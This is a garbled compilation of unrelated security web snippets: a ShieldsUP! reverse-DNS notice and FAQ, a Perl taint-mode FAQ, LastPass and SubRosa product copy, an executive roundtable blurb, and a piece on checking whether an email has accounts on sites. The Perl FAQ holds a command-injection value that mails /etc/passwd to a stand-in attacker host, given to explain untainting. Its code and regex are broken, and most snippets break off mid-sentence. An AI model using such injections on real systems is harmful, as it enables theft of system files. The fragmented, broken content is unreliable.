Secunia - The Leading Provider of Vulnerability Management and Vulnerability Intelligence Solutions

ShieldsUP! — Internet Vulnerability Profiling Your Internet connection's IP address is uniquely associated with the following "machine name": The string of text above is known as your Internet connection's "reverse DNS." The end of the string is probably a domain name related to your ISP. This will be common to all customers of this ISP. The concern is that any web site can easily retrieve this unique "machine name" (just as we have) whenever you visit. If the machine name shown above is only a version of the IP address, then there is less cause for concern because the name will change as, when, and if your Internet IP changes. There is no standard governing the format of these machine names, so this is not something we can automatically determine for you. Just something to keep in mind as you wander the Internet.

CGI/Perl Taint Mode FAQ For example, if $form_data{"email"} is "tainted", then the following would still be legal: print $form_data{"email"} . "\n"; because the print command is not an unsafe operation. But if you try to pass the same variable to an unsafe version of a system call system("mail " . Perl will complain and not allow this. "me@mydomain.com; mail hacker@hack.net < /etc/passwd" Clearly, there are security ramifications. Thus, if you want to do that type of command with a user supplied variable, you must always untaint it regardless of whether it contains harmless input or not. To untaint a variable, you use regular expressions. The only way to untaint a variable is to do a regular expression match using () groups inside the regular expression pattern match. Perl considers these new variables that arise from () groups to be untainted. The following will illustrate this: EMail addresses consist of word characters (a-zA-Z_0-9), dashes, periods and an @ sign. /\w{1}[\w-.] $email = $form_data{"email"}; OK. No.

EasyGPS - FREE GPS Software for your Garmin, Magellan, or Lowrance GPS

Shields UP! -- Officially Unofficial ShieldsUP! FAQ ShieldsUp! Newsgroup Frequently Asked Questions Written and Compiled by Chris Baker Version 1.14 - 16 April 2000 Please note: If you wish to contact me with errors, omissions, or suggestions regarding this FAQ, feel free to e-mail me at faq-admin@home.com, and I will try to get back to you within 72 hours. However, if you have general questions or technical support issues regarding ShieldsUp!, or anything else for that matter, I regret that I have neither the time nor the resources to assist you directly. , or better yet, post your question in one of the ShieldsUp! Table of Contents Introduction This FAQ came into being on 29 February 2000, primarily because I got tired of answering the same few questions over and over again. Right now, it basically represents a compilation of what I know about internet security, with the excellent comments of several others thrown in. I also want to thank Dave Moose, a.k.a.

Security Summit Network World - Can security be a competitive advantage? Are security and privacy at odds with speed and collaboration? How has Sarbanes-Oxley complicated the security challenge? And how do you balance risk and security? Those are just some of the pressing questions 23 prominent IT executives and academics addressed at a recent daylong executive roundtable at Dartmouth College in Hanover, N.H. The Thought Leadership Summit on Digital Strategies is an ongoing series of discussions for Fortune 500 CIOs and vice presidents focused on the business issues they face and the enabling role of IT. Participants represented some of the largest and most well-known companies in the U.S., including Fidelity, Staples, Citigroup, Owens-Corning, IBM, General Motors, Hasbro and Cisco. The executives shared with peers their security fears, goals, frustrations and challenges. There was widespread agreement on that point, but several participants noted that sometimes they can't avoid it.

Technology Your Security Is Our Priority Availability You need to always have access to your data, we've accomplished this in multiple ways, first we have 2 data-centers in production service, second we store your encrypted data on your local PC when you login, so that if LastPass.com can't be reached, you can still login to the add-on and get to your accounts. The website is usable without the add-on installed (the Encryption and Decryption happens in JavaScript which you can see happen on some forms), but we take advantage of faster encryption available in the add-ons if they're available. We also have a mobile site m.lastpass.com if you're on your phone. Security On Windows, LastPass helps find insecure passwords stored on your computer so you can store them securely in LastPass and remove the easy access by malicious software. Sharing Accounts With Friends Automated Testing Code Reviews Package Management

Macintosh Security Site -> SubRosa Utilities easy-to-use encryption and shredding software for Mac OS and X SubRosa Utilities (encryption/decryption file deletion) Information: SubRosa Vol 1-File Utilities is SubRosaSoft.com Ltd's first line of privacy products which help Macintosh users secure themselves and their personal data. The suite of software to protect your files consists of the following: file and folder encryption, multi-pass shredder, and free decryptor. SubRosa Encryptor The SubRosa Encryptor allows you to take files or folders and convert them into an encrypted archive that you can store safely using 128 bit key encryption. Your friend or family can easily decrypt the files by downloading the SubRosa decryptor for free from the FWB web page. A 'shred' feature is available within the decryptor which allows the user to securely delete the encrypted files once they have been decrypted. SubRosa Shredder SubRosa Shredder allows you to ensure that the files you want deleted from your computer stay deleted. The default overwrite policy is set at 3, which is considered most secure.

Reviews Here is the cream of the crop, the 100 best of 2009...automatically fills in saved log-ins and forms with the click of a button. This handy Web freebie and browser plug-in also syncs your data to any computer that you use regularly. ...all you have to do is log into LastPass and click the website you wish to check out. ...I've completely switched my entire solution for managing passwords, after spending days researching it and testing it and playing with it, over to LastPass...And they really have nailed it. If you don't create strong passwords, you are a sitting duck....What I do honestly is use a password manager. Since LastPass is free and has the edge on browser and Mac compatibility, it should probably be your first pick.

How Private Are Sites' Membership Lists? Something like this is actually possible with quite a few well-known sites -- given a person's e-mail address, it is possible to find out if they have an account with Match.com, PayPal, Netflix, eBay, Amazon, and Google (and, by the way, Slashdot [CT: We'd fix it if I thought it mattered]). For some of those sites, it may even be possible to take a long list of e-mail addresses and use an automated process to find out which of those addresses have accounts with those sites (something I didn't want to risk trying myself, but as a general rule, if you can do it once, you can do it many times, at least if you do it slowly enough). It does not enable the attacker to extract addresses from a site's membership rolls, which is a much more serious type of breach -- in this case, the attacker would have to already know a list of e-mail addresses, and would only be able to find out which of those addresses have accounts with a given service. Try to create a new account with that e-mail address.
